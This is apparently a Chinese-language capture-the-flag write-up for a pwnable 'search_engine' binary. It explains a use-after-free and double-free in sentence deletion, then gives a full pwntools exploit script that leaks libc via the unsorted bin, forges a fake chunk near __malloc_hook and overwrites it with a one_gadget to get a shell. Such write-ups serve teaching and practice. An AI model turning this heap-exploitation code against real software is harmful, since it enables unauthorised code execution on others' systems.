_add_sentence
单词的结构体,gdb中的显示
单词的结构体为
struct word { char *word_content; int word_size; char *sentence_content; int sentence_size; }
edit函数
delete函数
UAF:然后看 free 的条件是否有限制,没有限制的话会造成 double free。这里的限制是先查找 word,但是当包含该 word 的 sentence 被删除时,仅仅是将 sentence 的内容置为 0,word 节点中的单词并没有删除,因此可以通过查找 \x00 再次释放或显示该 sentence,即 double free 和 unsorted bin leak。
先申请 small chunk,释放后进入 unsorted bin,再通过查找 \x00 显示 sentence,泄露 libc 地址。
通过 double free 触发 house of spirit,改写 malloc_hook,触发 onegadget。
申请掉多余的 chunk,得到指向 fake chunk 地址的 chunk,修改 malloc_hook 为 onegadget。
再次分配chunk,就会触发onegadget
from pwn import *# challenge informatp.context(arch='amd64',os='linux',log_level='debug')myelf = ELF("./search_engine")#libc = ELF("./libc_64.so.6")#p = process(myelf.path,env={"LD_PRELOAD" : libc.path})p = process(myelf.path)#p = remote('chall.pwnable.tw', 10203)# local libclocal_libc_64 = ELF("/lib/x86_64-linux-gnu/libc.so.6")local_libc_32 = ELF("/lib/i386-linux-gnu/libc.so.6")# functp.s for quick scripts = lambda data :p.send(data) sa = lambda delim,data :p.sendafter(delim, data) sl = lambda data :p.sendline(data) sla = lambda delim,data :p.sendlineafter(delim, data) r = lambda numb=4096 :p.recv(numb)ru = lambda delims :p.recvuntil(delims)pa = lambda :p.interactive()# misc functp.suu32 = lambda data :u32(data.ljust(4, b'\0'))uu64 = lambda data :u64(data.ljust(8, b'\0'))leak = lambda name,addr :log.success('{} : {:#x}'.format(name, addr))def debug(): gdb.attach(p) pause() #passdef add_fake(size,cont): sla('3: Quit\n','2') sla('Enter the sentence size:\n',str(size)) sa('Enter the sentence:\n',cont.ljust(size,'x'))def add(size,cont): sla('3: Quit\n','2') sla('Enter the sentence size:\n',str(size)) sa('Enter the sentence:\n',cont.rjust(size,'x')) def delete(cont): sla('3: Quit\n','1') sla('Enter the word size:\n',str(len(cont))) sa('Enter the word:\n',cont) sla('Delete this sentence (y/n)?\n','y')def show(cont): sla('3: Quit\n','1') sla('Enter the word size:\n',str(len(cont))) sa('Enter the word:\n',cont)#leak libc add(0x88,' index0')debug()delete('index0')debug()show('\x00'*6)p.recvuntil(': ')libc_base = uu64(p.recv(6)) - 88 -0x3c4b20log.success('libc_base==>'+hex(libc_base))sla('Delete this sentence (y/n)?\n','n')one = libc_base + 0xf1247#alert double freeadd(0x60,' index1')add(0x60,' index2')add(0x60,' index3')#delete the sentence by the word delete('index1')delete('index2')delete('index3')show('\x00'*6)sla('Delete this sentence (y/n)?\n','n')sla('Delete this sentence (y/n)?\n','y')debug()#fake chunkfake = libc_base + local_libc_64.sym['__malloc_hook'] -0x23 
add_fake(0x60,p64(fake))add(0x60,'pad')add(0x60,'pad')debug()add_fake(0x60,'a'*0x13+p64(one))gdb.attach(p)p.interactive()